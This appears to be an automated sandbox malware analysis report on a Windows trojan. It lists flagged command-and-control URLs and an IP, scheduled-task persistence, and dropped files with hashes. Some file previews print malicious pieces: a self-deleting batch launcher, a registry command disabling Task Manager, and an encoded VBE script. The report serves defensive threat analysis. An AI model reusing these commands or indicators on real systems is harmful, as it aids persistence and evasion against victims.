http://52952cm.darkproducts.ru/L1nc0In.php?0dYlI1orS1H6xFOx8XSck9t=FZ&6f2f8138a6e862c9cc5a89afaa068eff=310dbed95ebf165903903d07e44ebdc0&c6a92fac9f4420a60e173afb34e4bea8=wMlZTNyYWZzUDZhN2NzczN4UDZlljY2YTN0MjZyUmNzcjNiRDO1YjY&0dYlI1orS1H6xFOx8XSck9t=FZ	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://52952cm.darkproXz	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://52952cm.darkproducts.ru/	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://52952cm.darkproducts.ru/L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv7	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036AB000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000359A000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000340E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000328D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000037BC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003332000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032C6000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003786000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000034F3000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003606000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003369000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003567000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003681000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://52952cm.darkproducts.ruPm1	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000032FC000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000363D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	driverDhcp.exe, 00000005.00000002.2057566472.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://52952cm.darkproX	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.0000000003485000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000382E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://52952cm.darkproducts.ru	uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp, uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, 00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.12.142	52952cm.darkproducts.ru	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583828
Start date and time:	2025-01-03 17:01:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Mj6WEKda85.exe renamed because original name is a hash value
Original Sample Name:	3A74D8F05D5E7A64227D5521D1EB23AE.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@29/14@1/1
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 54% Number of executed functions: 281 Number of non-executed functions: 90
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RuntimeBroker.exe, PID 2428 because it is empty
Execution Graph export aborted for target driverDhcp.exe, PID 1520 because it is empty
Execution Graph export aborted for target uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, PID 1996 because it is empty
Execution Graph export aborted for target uVyodHPItdaFNnFIblVMLhppqvOTKO.exe, PID 3992 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Mj6WEKda85.exe

Simulations

Behavior and APIs

Time	Type	Description
11:01:57	API Interceptor	13914348x Sleep call for process: uVyodHPItdaFNnFIblVMLhppqvOTKO.exe modified
17:01:56	Task Scheduler	Run new task: RuntimeBroker path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
17:01:56	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
17:01:56	Task Scheduler	Run new task: ShellExperienceHost path: "C:\Program Files (x86)\windows media player\ShellExperienceHost.exe"
17:01:56	Task Scheduler	Run new task: ShellExperienceHostS path: "C:\Program Files (x86)\windows media player\ShellExperienceHost.exe"
17:01:56	Task Scheduler	Run new task: uVyodHPItdaFNnFIblVMLhppqvOTKO path: "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"
17:01:56	Task Scheduler	Run new task: uVyodHPItdaFNnFIblVMLhppqvOTKOu path: "C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://rfqdocu.construction-org.com/Q5kL4/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	https://www.earthsatellitemaps.co/esmrel/landing.php?uid=0&lid=0&sid=531485973&sid2=1361197931118060&sid3=&sid4=google%20maps%20pro&sid5=&sid6=&sid7=&sid8=&rid=&_agid=0&aid=0&r=657&_agid=73407&msclkid=8b3e7b2e92fe1f072cfc1c5c7ae3c44d	Get hash	malicious	Unknown	Browse	104.17.25.14
	same.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm	Browse	188.114.96.3
	m.txt.ps1	Get hash	malicious	Unknown	Browse	172.67.212.107
	https://t.co/jNNzVU90SA	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	nayfObR.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	http://www.klim.com	Get hash	malicious	Unknown	Browse	104.18.27.193
	XClient.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	7z91gvU.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	104.26.13.205

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Program Files (x86)\Windows Media Player\ShellExperienceHost.exe

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.078060420774637
Encrypted:	false
SSDEEP:	12288:bgvLmvri2UmajvYyRt2FLa9f5yLVGszM66mozBwn9UO96VeRMY:omvm2Um2sLaF5yLVGCU8OY
MD5:	5073237558733D40EB37F2616E755ACF
SHA1:	D05ACF3E6BA8060EEADF91DA7C75ED41C20B32D3
SHA-256:	FE0E286986F12346CA7D30269F996F7100A23DBF48C9A8C7329844F12CCFBDCD
SHA-512:	3BE68921704687643C10366AC89ED849546CF53BE02D87A0A4BFD44F8CFFFD983E7D1018A013ACB95613174C929CCD4C196046323BE8F9AC8F523BD32BC93F70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Windows Media Player\f8c8f1285d826b

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	59
Entropy (8bit):	5.026213811853692
Encrypted:	false
SSDEEP:	3:ptKDvpcooU9OQQRmh3GEsn:ODvpRoU9YAh2Esn
MD5:	48B6436A86DF801BD7413AB98D3DF474
SHA1:	6AB7BDE985A0F46845D46637EB5C0D22A3FA5C0D
SHA-256:	EBFA4CDEB6BD497C49D9E16594A4BB49EFDE11CD72A75DC44A2705A59E4F87F1
SHA-512:	07EBFB50F9B527B8C66D8D3929F683320A2015325FFC6BA979BEADA6C07B4D6C891BDD5ED2BAC317A03E52A2D199C1E6E388DBCA40C6A297BD95F4E42B7FAA5A
Malicious:	false
Preview:	6w31Tv0MicZ8JteXvjTUv3cctNFlyyw1UxudXlepDb8KSuu4y2trvXRCTaI

C:\Users\Default\Pictures\9e8d7a4ca61bd9

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	ASCII text, with very long lines (983), with no line terminators
Category:	dropped
Size (bytes):	983
Entropy (8bit):	5.927982688856871
Encrypted:	false
SSDEEP:	24:QtGgATzC5ApnzfiVW1Ct2iNIxpFwE2LAcjoZs:OFA+8zKW1C8NFiAc02
MD5:	3316E639B9E45E4328CD8B4F7AAC70DC
SHA1:	ADC6D72327CE0B6BE302379890AF9DB5D5A2D209
SHA-256:	89949E2E6CFF8C88D5A5ED1ABAA54899348A9740CF47BEEBD1A0AE26B0831107
SHA-512:	F3308E7D0B5EC577ABD54BDD3776323118537B755604C6902F20F0ED00B0FE6CBB30831E79B1CCE12C3FC6D63916A2E2ED6A9F5AE6F47350E3656FA8067C181A
Malicious:	false
Preview:	BAKFoQT5RK8dKw6EEG6fsJ7dX8xDOeuFY5w2jlGH8HBQKnfcbolbs0Q1CrrqcPqxZ2EP9Dfd9yhkIqSucVlj3TWio5z14aosaO1RiQcYIIb3SptVY6OHnH3FfglEOoijKzK3zBMM2Nav1dP8Ldd7LgETUvvCoYJej1tdfzfWuBPZqHNCRm2uKkXnu0jEPJheE5MAtvdW7GNKRonMhtvCfZU8eFtpQbHkevVu5NTfJgwDXNWFNWhgYf8olNgoCxFg9mpgS2RTZP29mQlQtnc43kL9wrIsrocVaQEui0xUENGJm9CVlP4YVLmZaqtltimvwhiWM0s20IzqdCWxpxGbuEAPnpU1GLkglVWFapJvhBiNV65YT666bKAsgTshg0wohTEHqRX9oV4sfw3rt5iKPoEbUniG7mOqP3pC1xrCj6RGPSNuZAxkSmZ3OnwDsQCCHNcmH1z5OfkTX8LCayr6ynYnewxOAoTT4O9CzkniL1WwBGgQbum4iFOdzzHUDl4kMRYI9JMzLJv6RllYQhxQBZuyAfN9dSek7vktrXRShxtZURLNNtEgyoixhjHd5NV2oL9gB2q2PesOpUetUAvuO7wSMxLIPyWUb0vIRpMVCLQT5UHNEYI5blorZqTNqimbHYwzjVbpxasCqcX2p8D1pb2zLDtlW8odjyLhhRnt7dHB3lA6Tbhrfvwqf7nfm0SzvOd2QzUYUU3LT16kDxR5a68xCfBknIGHKSPpIIpeGJXK1kXnADbyiXYyPpzvxtuMNwAAmQb5HxyRjx6bIYjjqRiw4bZcS3qXYK7FjWBtlgrvjGObtYnZJKf5OOFK19mNGa2Y001vW08KkwMxM7s4QQOOpB1VQ02m3dpJOzl3g2CTMVVbBS74Rs7zMoty9fef7VQGHDjXVzXXO5BTqZU838VKgz7jGw3BXgV0EOU7skibVjlRmZIkLgm9AFkRG9Rj5WArjKPcEWPSZ3z6Nq6qoTz

C:\Users\Default\Pictures\RuntimeBroker.exe

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.078060420774637
Encrypted:	false
SSDEEP:	12288:bgvLmvri2UmajvYyRt2FLa9f5yLVGszM66mozBwn9UO96VeRMY:omvm2Um2sLaF5yLVGCU8OY
MD5:	5073237558733D40EB37F2616E755ACF
SHA1:	D05ACF3E6BA8060EEADF91DA7C75ED41C20B32D3
SHA-256:	FE0E286986F12346CA7D30269F996F7100A23DBF48C9A8C7329844F12CCFBDCD
SHA-512:	3BE68921704687643C10366AC89ED849546CF53BE02D87A0A4BFD44F8CFFFD983E7D1018A013ACB95613174C929CCD4C196046323BE8F9AC8F523BD32BC93F70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\driverDhcp.exe.log

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.36827240602657
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
MD5:	B28E0CCD25623D173B2EB29F3A99B9DD
SHA1:	070E4C4A7F903505259E41AFDF7873C31F90D591
SHA-256:	3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
SHA-512:	17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe.log

Download File

Process:	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\9hYFnRH7ET.bat

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	209
Entropy (8bit):	5.071585675852359
Encrypted:	false
SSDEEP:	6:hITg3Nou11r+DE1WD5TxrxvIKOZG1923fPK:OTg9YDEoTxRWK
MD5:	4FCF9F7CFB461F2039E9892BE4805E1B
SHA1:	070895A2133076BDEB49C3CBC6DA68D38719FDAB
SHA-256:	DBE19027BA2C79386639B637D0F6AB9B07280F37EDCA4501E180C09C43ECEA37
SHA-512:	97FA25F3255E5F93AC93D92CCBEA077FE08C70C0B91442C7F42CBB7EBAD3E4250B73060D09896C4F36577B8EB90B69BCD5F9001165B51145D872B10A10C03073
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Default\Pictures\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9hYFnRH7ET.bat"

C:\Users\user\AppData\Local\Temp\UKzmYeaGeM

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:sktIM7WhXNOPn:sk6MKNOP
MD5:	E9D94781F97A76F6612DE8E96966BD7B
SHA1:	5B553A31D96938A45586AA7839FF43091449D7B7
SHA-256:	1990EF4E719B77FAF794A13C6CD18EA4565A15121E874091D0F42D54DC5F5264
SHA-512:	CD8B7B8AB118909801FF97B7E0A7ECBB750BE2B2C2CAD84FE1B615863BBB09E08F5DDEDF8C8B7FEE744B964D3205A3C45C305ABD674877372A1222B37088BF23
Malicious:	false
Preview:	8JK8AHmr9awsDJJicOSVBqO3j

C:\Windows\Offline Web Pages\f1490002b2f98f

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	ASCII text, with very long lines (943), with no line terminators
Category:	dropped
Size (bytes):	943
Entropy (8bit):	5.880356529931565
Encrypted:	false
SSDEEP:	24:0pQDQfGhbXpa5VvYNHJ1wq+4Ci3dC2TxHDkbKTC20e1hm:0iQfGhbM5+N3wq+4tNRFDkYC+m
MD5:	1709C407CD3CC0F82C27A811813743C6
SHA1:	8CFE9F54E53CDE5B20534216BB415BEF8928E04B
SHA-256:	A1D4DE62F225F01446F7E4539B1CE340927827B5C19398E18017CDBABE711B47
SHA-512:	F2AA890B8566484863425038A1839B9D567A0B2C4F28DD594A8F8E419A5A8F52468FFD7E08DAAF3DCF177FBCD76864E90B79CA2837D01199ED8F65814C42BACC
Malicious:	false
Preview:	vrmQyql77FptYOcRRFCwJQFV2wrsUQ5PuYTyUrl0df9EZOPistSzEswflRXC83nrKa894n7jdLToRA5ohI9l7GLBmyMDTj1k2S49PPoFwsW2ZHNlVsez4CtEO7XGb4P3Utw9F6ZRe3yPtSmekkrkEBp0i0uR2ho2ccipUOgZTNVANeU6U2f0MoySD6aOLHZ7P5wQu6JWESR1qpmEgy69ByqxoQmYxRNLxXuRsDLYsIv4X6lYUWsXLZ5bP8meUvjxEGES4UWcmiQ2CvaroOEai0AXcTCtbrE7j7zR2Sd9AQumICYdh4zGrIONFq0lSmA5eTTF5JyWuEaSGXPZ5iMg17QatmLMb2rXPyIztTiYGdVmr6HsbbpuZeDgC2WT7m41XCDRPZplAxaYmntwedv9M67uumw07OadidPo2zcBwEumDo3ZJjye15paEShmmyovX70IYE3pAtNIMVrFsXrYZ6mmyykkS0Z7Z8OGyvAFpJeHrgOtlb4OHQWbUNUjeTXKUQsNGkR7XlsQce5Rk0915KzJmxwkablVvTxbyAmBJ71ghG9zSC9nUgPJbjlTyqg5AWeIqedkO7r7TTlfy6SXb8BPEo9OYSNcb5gKm0IxjYYWyR0I7Fe1YIeBVOECeOL6uPgXwa37xeyCkobxy1RSyVESbezXwGTVNcljucVgLgE3UbbqxQOn62IZLN5SlgLrLczID2CVguHRQK8ADJkf1qYUUMXggD5pVXs1lTn5O3HMv1IAO5Oc5pzeDey0efycyb53bHZufpR8jLjdDXSlydtqhNxGfwasEoYT5OjHge6QX0515UxHNNoUrOVNTSPtOj45xPhzxKFThdSrS5KK9Te19Dlq2VyNPMCy6AEqx8TDHUxO5o5YHEu4FC5un06cW2DUbeuR1eWAAbtoPXvOZaFKcHs3FTC7C0rPQdxb4ogmst4

C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Download File

Process:	C:\savesbrokerCrt\driverDhcp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.078060420774637
Encrypted:	false
SSDEEP:	12288:bgvLmvri2UmajvYyRt2FLa9f5yLVGszM66mozBwn9UO96VeRMY:omvm2Um2sLaF5yLVGCU8OY
MD5:	5073237558733D40EB37F2616E755ACF
SHA1:	D05ACF3E6BA8060EEADF91DA7C75ED41C20B32D3
SHA-256:	FE0E286986F12346CA7D30269F996F7100A23DBF48C9A8C7329844F12CCFBDCD
SHA-512:	3BE68921704687643C10366AC89ED849546CF53BE02D87A0A4BFD44F8CFFFD983E7D1018A013ACB95613174C929CCD4C196046323BE8F9AC8F523BD32BC93F70
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 76%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\savesbrokerCrt\V4ZyqY05RylvaMusXQjEq4yt.bat

Download File

Process:	C:\Users\user\Desktop\Mj6WEKda85.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	146
Entropy (8bit):	5.013976971852898
Encrypted:	false
SSDEEP:	3:I54WHnSTodAZFQNBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKD:IlHSTAXTStuH1jhRiI36BY
MD5:	F26ED4D9BA5EB6633B1EFA459CECEF65
SHA1:	F08699D2C3BF0F9C14980333FF65AF6F257F8C6B
SHA-256:	1E44A16C3515046AC3276D270AF0FAC2886525BE0DB637E89F6D670BA80BDD85
SHA-512:	102629EB279B1AC9FE967D146C6CDF19EDBAB713C1C87E41F606103FBC6569C1EE72A4B37EAED92457649BF8CD407CCBB0C80C3F59B8FAFD88E8403AECD34AF4
Malicious:	false
Preview:	"C:\savesbrokerCrt\driverDhcp.exe" & reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\savesbrokerCrt\bcvGZWoxOhP8n94Lb3YDqsN.vbe

Download File

Process:	C:\Users\user\Desktop\Mj6WEKda85.exe
File Type:	data
Category:	dropped
Size (bytes):	215
Entropy (8bit):	5.874791643265369
Encrypted:	false
SSDEEP:	6:GigwqK+NkLzWbHZEG8nZNDd3RL1wQJRR4zuj62EOJGtYY7s:GoMCzWL6G4d3XBJbl62TIYY7s
MD5:	F2960594DFE7DBFB4257D50E5E9A0C6C
SHA1:	1187F9ECE82996E624B73F3E621D81BFF91D7D20
SHA-256:	F7BF62EC2D165445544FF0AC53F056A0BD7C2D2FF4F3CDD473A25EB856D27D2F
SHA-512:	B972468949121C774ECD0E871E535F124105F2A6CC9FF16F3452027D8A0EF9721B55A0507A430168A2B5B48F5E39274C74BD85997FA5C857D19AA5A4DAA57A9B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^vgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/C7+k4DK3..ZMY&.W}z5I!"zV7lH!dppN2$czY 8mYE~,T~,0Csk+Iz0AAA==^#~@.

C:\savesbrokerCrt\driverDhcp.exe

Download File

Process:	C:\Users\user\Desktop\Mj6WEKda85.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	847360
Entropy (8bit):	6.078060420774637
Encrypted:	false
SSDEEP:	12288:bgvLmvri2UmajvYyRt2FLa9f5yLVGszM66mozBwn9UO96VeRMY:omvm2Um2sLaF5yLVGCU8OY
MD5:	5073237558733D40EB37F2616E755ACF
